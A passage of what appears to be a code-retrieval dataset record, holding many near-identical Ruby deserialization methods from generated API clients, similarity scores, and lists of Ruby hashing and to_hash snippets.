"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = NSXT.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = NSXT.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = NSXT.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = TreezorClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = TreezorClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = TreezorClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = SwiftApi.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = SwiftApi.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = TripletexApi.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = unwiredClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Quandoo.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end"
] |
[
"0.7330926",
"0.7274019",
"0.72504056",
"0.7245751",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.72291344",
"0.7218884",
"0.7213926",
"0.71909",
"0.7183136",
"0.71796805",
"0.71796805",
"0.71796805",
"0.71796805",
"0.71796805",
"0.71796805",
"0.71796805",
"0.71791923",
"0.71791923",
"0.71791923",
"0.71791923",
"0.71791923",
"0.71791923",
"0.71791923",
"0.71791923",
"0.71791923",
"0.71791923",
"0.71712995",
"0.71712995",
"0.71712995",
"0.71712995",
"0.71712995",
"0.71632504",
"0.71549904",
"0.71473306",
"0.71413666",
"0.71413666",
"0.7141116",
"0.7141116",
"0.7141116",
"0.7133874",
"0.7133874",
"0.7133874",
"0.7133874",
"0.71333444",
"0.71333444",
"0.7127688",
"0.7125744",
"0.71210617",
"0.71210617",
"0.71190786",
"0.71184087",
"0.711393",
"0.7113519",
"0.7113519",
"0.7113516",
"0.71119875",
"0.71119875",
"0.71119875",
"0.7105169",
"0.7105169",
"0.7105169",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7104928",
"0.7102596",
"0.7102596",
"0.7102596",
"0.7101596",
"0.7101596",
"0.7101596",
"0.70996517",
"0.70996517",
"0.7097952",
"0.7097185",
"0.70965225"
] |
0.0
|
-1
|
Returns the string representation of the object
|
def to_s
to_hash.to_s
end
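
A minimal sketch (the Widget class is invented for illustration, not taken from the dataset) of why this delegation is useful: because to_s just stringifies to_hash, printing a generated model shows its serialized attributes instead of the default #<Object:0x...> form.

class Widget
  def to_hash
    { name: 'gear', teeth: 12 }
  end

  # Same pattern as the document above: delegate string conversion to the hash.
  def to_s
    to_hash.to_s
  end
end

puts Widget.new  # => {:name=>"gear", :teeth=>12}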
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def to_s\n @object.to_s\n end",
"def to_s\n object.to_s\n end",
"def serialize(object)\n object.to_s\n end",
"def to_s\n self.inspect\n end",
"def to_s\n @string || @object.to_s('F')\n end",
"def to_s\n @string || @object.to_s('F')\n end",
"def to_s\n \"#<#{self.class.name}:#{object_id} #{info}>\"\n end",
"def to_s\n \"#<#{self.class.name}:#{object_id}> @names=#{names}>\"\n end",
"def to_s\n self.inspect\n end",
"def to_s\n toString()\n end",
"def to_s\r\n dump\r\n end",
"def to_s\n inspect\n end",
"def to_s\n toString\n end",
"def toString\n #Not sure if we want this or just use the getters for more\n #selective formatting\n end",
"def to_s\n\t\t\t@string\n\t\tend",
"def to_s\n stringify\n end",
"def to_s\n to_h.to_s\n end",
"def to_s\n @string\n end",
"def to_s\n @string\n end",
"def to_s\n @string\n end",
"def to_s\n @string\n end",
"def to_s\n @string\n end",
"def to_s\n @string\n end",
"def to_s\n @string\n end",
"def to_s\n @string\n end",
"def inspect\n serialize.to_s\n end",
"def inspect\n to_s\n end",
"def to_s\n @string ||= Builder::ToString.new(self).string\n end",
"def to_s\n self\n end",
"def to_s()\n serialize.to_s()\n end",
"def to_s()\n serialize.to_s()\n end",
"def to_s\n string\n end",
"def to_s\n inspect\n end",
"def to_s\n inspect\n end",
"def inspect\n to_s\n end",
"def inspect\n to_s\n end",
"def inspect\n to_s\n end",
"def inspect\n to_s\n end",
"def inspect\n to_s\n end",
"def inspect\n to_s\n end",
"def inspect\n to_s\n end",
"def inspect\n self.to_s\n end",
"def inspect\n self.to_s\n end",
"def inspect\n to_s\n end",
"def inspect\n to_s\n end",
"def to_s\n end",
"def to_s\n end",
"def to_s\n end",
"def to_s\n end",
"def inspect\n to_s.inspect\n end",
"def inspect()\n serialize.to_s()\n end",
"def inspect()\n serialize.to_s()\n end",
"def inspect\n return self.to_s\n end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end",
"def to_s; end"
] |
[
"0.901024",
"0.89506465",
"0.84703195",
"0.83409667",
"0.8337169",
"0.8337169",
"0.8332247",
"0.82546586",
"0.8145818",
"0.8144667",
"0.81357557",
"0.812714",
"0.8093436",
"0.8086725",
"0.8073356",
"0.8039774",
"0.80308646",
"0.80064154",
"0.80064154",
"0.80064154",
"0.80064154",
"0.7962831",
"0.7962831",
"0.7962831",
"0.7962831",
"0.7954296",
"0.79446983",
"0.7919419",
"0.7909274",
"0.78848016",
"0.78848016",
"0.78841925",
"0.788328",
"0.788328",
"0.78758216",
"0.78758216",
"0.78758216",
"0.78758216",
"0.78758216",
"0.78758216",
"0.78758216",
"0.7866813",
"0.7866813",
"0.7865939",
"0.7865939",
"0.7850519",
"0.7850519",
"0.7850519",
"0.7850519",
"0.7808076",
"0.7784745",
"0.7784745",
"0.7767656",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824",
"0.77608824"
] |
0.0
|
-1
|
to_body is an alias for to_hash (backward compatibility)
|
def to_body
to_hash
end
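
A hedged sketch of the compatibility contract: generated HTTP clients call to_body when building a request payload, so keeping it as a thin wrapper over to_hash (or an alias, as below) preserves older call sites. Payment is an invented example class.

class Payment
  def to_hash
    { amount: 100, currency: 'USD' }
  end

  # alias_method is equivalent to the explicit wrapper method in the document above.
  alias_method :to_body, :to_hash
end

Payment.new.to_body  # => {:amount=>100, :currency=>"USD"}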
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def to_body\r\n to_hash\r\n end",
"def to_body\n to_hash\nend",
"def to_body\n to_hash\nend"
] |
[
"0.84283537",
"0.8347048",
"0.8347048"
] |
0.0
|
-1
|
Returns the object in the form of a hash
|
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
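
A hedged sketch of the attribute_map contract this method relies on: the class exposes a map of Ruby attribute name to wire name, and nil attributes are skipped so they never appear in the serialized body. Account and its fields are invented for illustration.

class Account
  # Ruby attribute => JSON key, as swagger-style generators emit it.
  def self.attribute_map
    { account_number: :'accountNumber', nickname: :'nickname' }
  end

  attr_accessor :account_number, :nickname

  def to_hash
    hash = {}
    self.class.attribute_map.each_pair do |attr, param|
      value = send(attr)
      next if value.nil?    # nil fields are omitted entirely
      hash[param] = value   # the generated code routes this through _to_hash
    end
    hash
  end
end

acct = Account.new
acct.account_number = '12-34'
acct.to_hash  # => {:accountNumber=>"12-34"} (nil nickname dropped)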
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def to_hash\n object\n end",
"def hash\r\n return to_s.hash\r\n end",
"def hash\n to_a.hash\n end",
"def hash\n [_hash, name, owner].hash\n end",
"def hash\n return to_s.hash\n end",
"def hash\n @hash\n end",
"def hash\n @hash.hash\n end",
"def hash\n @hash ||= self.to_a.hash\n end",
"def to_hash\n @hash\n end",
"def to_hash\n @hash\n end",
"def hash\n to_s.hash\n end",
"def to_hash\n @hash\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @object\n end",
"def to_h\n @hash\n end",
"def to_h\n @hash\n end",
"def hash\n to_h.hash ^ self.class.hash\n end",
"def as_hash\n @hash\n end",
"def __getobj__\n @hashobj\n end",
"def to_hash() end",
"def hash\n to_s.hash\n end",
"def hash\n to_s.hash\n end",
"def hash\n object_id\n end",
"def to_hash\n @_hash_\n end",
"def hash\n\t\treturn self.name.to_s.hash\n\tend",
"def to_hash\n to_a.hash\n end",
"def hash\n { hash: @hash, hashType: @hash_type }\n end",
"def hash\n data.hash\n end",
"def hash\n [self.class, to_h].hash\n end",
"def hash\n [self.class, to_h].hash\n end",
"def hash\n [self.class, to_h].hash\n end",
"def hash\r\n id.hash\r\n end",
"def hash\n \"#{self.class.name}-#{self.id}-#{@__metadata__.cas}-#{@__attributes__.hash}\".hash\n end",
"def hash\n attributes.hash\n end",
"def hash\n attributes.hash\n end",
"def hash\n attributes.hash\n end",
"def hash #:nodoc:\n __getobj__.hash ^ self.class.hash\n end",
"def hash\n self.to_f.hash\n end",
"def hash\n end",
"def hash\n end",
"def hash\n end",
"def to_hash\n return self\n end",
"def to_hash(object)\n validate_class_kit(object.class)\n\n @hash_helper.to_hash(object)\n end",
"def hash\n return @id.hash\n end",
"def to_h\n Hash[ self ]\n end",
"def to_hash\n Hash[self]\n end",
"def to_h\n @hash.dup\n end",
"def hash\n id.hash\n end",
"def hash\n id.hash\n end",
"def hash\n id.hash\n end",
"def hash\n id.hash\n end",
"def hash\n id.hash\n end",
"def hash\n id.hash\n end",
"def hash\n id.hash\n end",
"def hash\n id.hash\n end",
"def hash\n id.hash\n end",
"def hash\n id.hash\n end",
"def to_h\n @hash.dup\n end",
"def hash\n model.hash + key.hash\n end",
"def to_hash; end",
"def to_hash; end",
"def to_hash; end",
"def to_hash; end",
"def to_hash; end",
"def to_hash; end",
"def hash\n [self.class, to_s].hash\n end",
"def hash\n id.hash\n end",
"def hash\n id.hash\n end",
"def hash\n self.atoms.hash\n end",
"def to_h\n Hash[self]\n end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash\n\t\tvalue.hash\n\tend",
"def hash\n [description, routing_number, account_number, account_type, signatory, metadata, id, signature_url, bank_name, verified, date_created, date_modified, deleted, object].hash\n end",
"def hash\n @id.hash\n end",
"def hash\n id.hash\n end",
"def hash\n self.class.name.hash\n end",
"def to_h\n @_hash.dup\n end",
"def hash\n\t\t[@id].hash\n\tend",
"def hash\n [self.class, to_s].hash\n end",
"def __hash\n @hash\n end"
] |
[
"0.8270299",
"0.78767854",
"0.78726953",
"0.7802364",
"0.7789188",
"0.77806795",
"0.7775915",
"0.7767511",
"0.7760525",
"0.7760525",
"0.77559966",
"0.7731286",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7713916",
"0.7647042",
"0.7647042",
"0.7626769",
"0.760354",
"0.7595938",
"0.7582562",
"0.7579971",
"0.7579971",
"0.7535553",
"0.7495252",
"0.7433835",
"0.7411177",
"0.73843014",
"0.73661345",
"0.73658615",
"0.73658615",
"0.73658615",
"0.73600674",
"0.7359121",
"0.73590857",
"0.73590857",
"0.73590857",
"0.7340058",
"0.73356754",
"0.7329828",
"0.7329828",
"0.7329828",
"0.73170114",
"0.730566",
"0.73028016",
"0.7294603",
"0.72854036",
"0.72643596",
"0.72637254",
"0.72620076",
"0.72620076",
"0.72620076",
"0.72620076",
"0.72620076",
"0.72620076",
"0.72620076",
"0.72620076",
"0.72620076",
"0.726188",
"0.72524244",
"0.72511965",
"0.72511965",
"0.72511965",
"0.72511965",
"0.72511965",
"0.72511965",
"0.72479564",
"0.72474235",
"0.72474235",
"0.7241066",
"0.7229342",
"0.7228758",
"0.7228758",
"0.7228758",
"0.7228758",
"0.7228758",
"0.7228758",
"0.7228758",
"0.7228758",
"0.7228758",
"0.7228758",
"0.7224175",
"0.72185695",
"0.72126305",
"0.72116995",
"0.71945405",
"0.71828544",
"0.7181684",
"0.7171822",
"0.71657544"
] |
0.0
|
-1
|
Outputs non-array value in the form of a hash. For an object, use to_hash. Otherwise, just return the value
|
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
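
A small hedged demo of the recursion: arrays are compacted (nils dropped) and mapped element by element, hash values are converted recursively, anything responding to :to_hash (such as a nested model) is unwrapped, and plain scalars pass through. Nested is an invented stand-in for a generated model, and _to_hash is re-stated from the document so the snippet runs standalone.

Nested = Struct.new(:id) do
  def to_hash
    { id: id }
  end
end

def _to_hash(value)
  if value.is_a?(Array)
    value.compact.map { |v| _to_hash(v) }
  elsif value.is_a?(Hash)
    {}.tap { |hash| value.each { |k, v| hash[k] = _to_hash(v) } }
  elsif value.respond_to? :to_hash
    value.to_hash
  else
    value
  end
end

p _to_hash([1, nil, Nested.new(7), { a: Nested.new(8) }])
# => [1, {:id=>7}, {:a=>{:id=>8}}]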
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def hash\n [value].hash\n end",
"def hash\n [value].hash\n end",
"def hash\n\t\tvalue.hash\n\tend",
"def hash\n value.hash\n end",
"def hash\n @value.hash\n end",
"def hash\r\n return to_s.hash\r\n end",
"def to_hash\n @value\n end",
"def to_hash\n @value\n end",
"def hash\n @hash || @hash = (value.hash * -1)\n end",
"def output_hash; end",
"def to_hash() end",
"def hash\n return to_s.hash\n end",
"def hash\n value_id.hash\n end",
"def to_hash\n call\n @hash = @value\n @hash\n end",
"def hash\n to_s.hash\n end",
"def hash\n to_s.hash\n end",
"def hash\n self.to_f.hash\n end",
"def hash\n to_s.hash\n end",
"def to_hash(obj = T.unsafe(nil)); end",
"def to_h\n @value\n end",
